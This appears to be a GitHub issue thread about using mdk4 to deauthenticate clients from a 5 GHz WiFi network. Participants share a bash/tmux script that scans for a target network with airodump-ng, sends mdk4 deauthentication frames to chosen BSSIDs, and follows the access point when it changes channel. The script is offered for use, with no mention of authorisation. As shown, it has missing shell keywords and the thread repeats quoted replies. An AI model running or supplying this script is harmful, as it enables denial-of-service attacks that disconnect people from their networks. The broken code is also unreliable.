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how to deauth a 5ghz wifi
This is my code mdk4 wlan0 d -c[36,56,100] -B xx:xx:xx:xx:xx
The problem is that it changes channel every 3 second (if I'm not wrong), even when the channel has stations to deauth.
How to set it to hup only when the channel has no station to deauth. Thanks.
The default is hopping every 3 second It can't do like you said now. Without hopping, only one channel can be set
The default is hopping every 3 second It can't do like you said now. Without hopping, only one channel can be set
Is there any way to use an independent adapter to track the channel and the main adapter hops only when the channel changes.
The default is hopping every 3 second It can't do like you said now. Without hopping, only one channel can be set
Is there any way to use an independent adapter to track the channel and the main adapter hops only when the channel changes.
@jinglei207 i have wrote a bash script not in very good format but it does exactly what you said, it hunts the channel of the adapter is scanning for the bssid channel and if the channel changes it reruns the mdk4 in that channel without loosing time hopping in other channels, i will try to write it in python and c when i have more time
The default is hopping every 3 second It can't do like you said now. Without hopping, only one channel can be set
Is there any way to use an independent adapter to track the channel and the main adapter hops only when the channel changes.
@jinglei207 i have wrote a bash script not in very good format but it does exactly what you said, it hunts the channel of the adapter is scanning for the bssid channel and if the channel changes it reruns the mdk4 in that channel without loosing time hopping in other channels, i will try to write it in python and c when i have more time
hi, the link is removed but lucky me I still have it and works beautyfully, is there an updated version? if not do you mind if I share the old one?
i made it public again ,enjoy!
I took the personal challenge to make my first tmux bash script from this ; you can put the code below in a file make it executable and run it with bash
Credits to @zartaz for the original code
tmux select-pane -t 0 -T main
function yes_or_no {
while true; do
read -p "$* [y/n]: " yn
case $yn in
[Yy]*) return 0 ;;
[Nn]*) echo "Aborted" ; return 1 ;;
sudo rm -f *.csv target_aps.txt > /dev/null
tmux split-window -dv -l 20 'iwconfig ; read'
tmux select-pane -t 1 -T interface_selection
read -rp "WLAN interface airodump (for channel chasing): " airodump_interface
export airodump_interface="$airodump_interface"
read -rp "WLAN interface mdk (for deauthentication): " mdk_interface
export mdk_interface="$mdk_interface"
read -rp "ESSID (Wifi boradcast name) to look for: " essid
export essid="$essid"
tmux kill-pane -t 1
sudo airmon-ng check kill > /dev/null
sudo airmon-ng start "$airodump_interface" > /dev/null
sudo iwconfig "$mdk_interface" mode monitor
tmux split-window -dh -l 95 "sudo airodump-ng -w scan -b abg --essid '$essid' --output-format csv -M $airodump_interface ; read"
tmux select-pane -t 1 -T network_information_gathering
read -rp "BSSID (mac address) to deauth: " bssid_target && echo "$bssid_target" >> target_aps.txt
yes_or_no "Add another mac ?" && read -rp "BSSID (mac address) to deauth: " bssid_target && echo "$bssid_target" >> target_aps.txt
yes_or_no "Add another mac ?" && read -rp "BSSID (mac address) to deauth: " bssid_target && echo "$bssid_target" >> target_aps.txt
export bssid_target="$bssid_target"
echo "Waiting a few seconds for airodump to scan all channels for our essid.."
sleep 4
mdk_channel=$(grep "$bssid_target" -m1 scan-01.csv | cut -d "," -f 4 | tr -d ' ')
export mdk_channel="$mdk_channel"
echo "The current channel for our target network is $mdk_channel !"
echo "Let's start deauthing and monitor channel changes !"
tmux split-window -v -l 20 "sudo mdk4 $mdk_interface d -b target_aps.txt -c $mdk_channel"
sleep 0.5
tmux select-pane -t 1 -T deauthentication
while true; do
mdk_new_channel=$(grep "$bssid_target" -m1 scan-01.csv | cut -d "," -f 4 | tr -d ' ')
export mdk_new_channel="$mdk_new_channel"
sleep 0.3
if [[ "${mdk_new_channel}" =~ ^([0-9]+)$ ]] && [ $mdk_new_channel -ne $mdk_channel ]
echo "Channel has changed from $mdk_channel to $mdk_new_channel !"
echo "Restarting deauth on new channel !"
export mdk_channel="$mdk_new_channel"
tmux kill-pane -t 1
sleep 0.5
tmux split-window -v -l 20 "sudo mdk4 $mdk_interface d -b target_aps.txt -c $mdk_channel"
sleep 0.5
tmux select-pane -t 1 -T deauthentication
sleep 0.3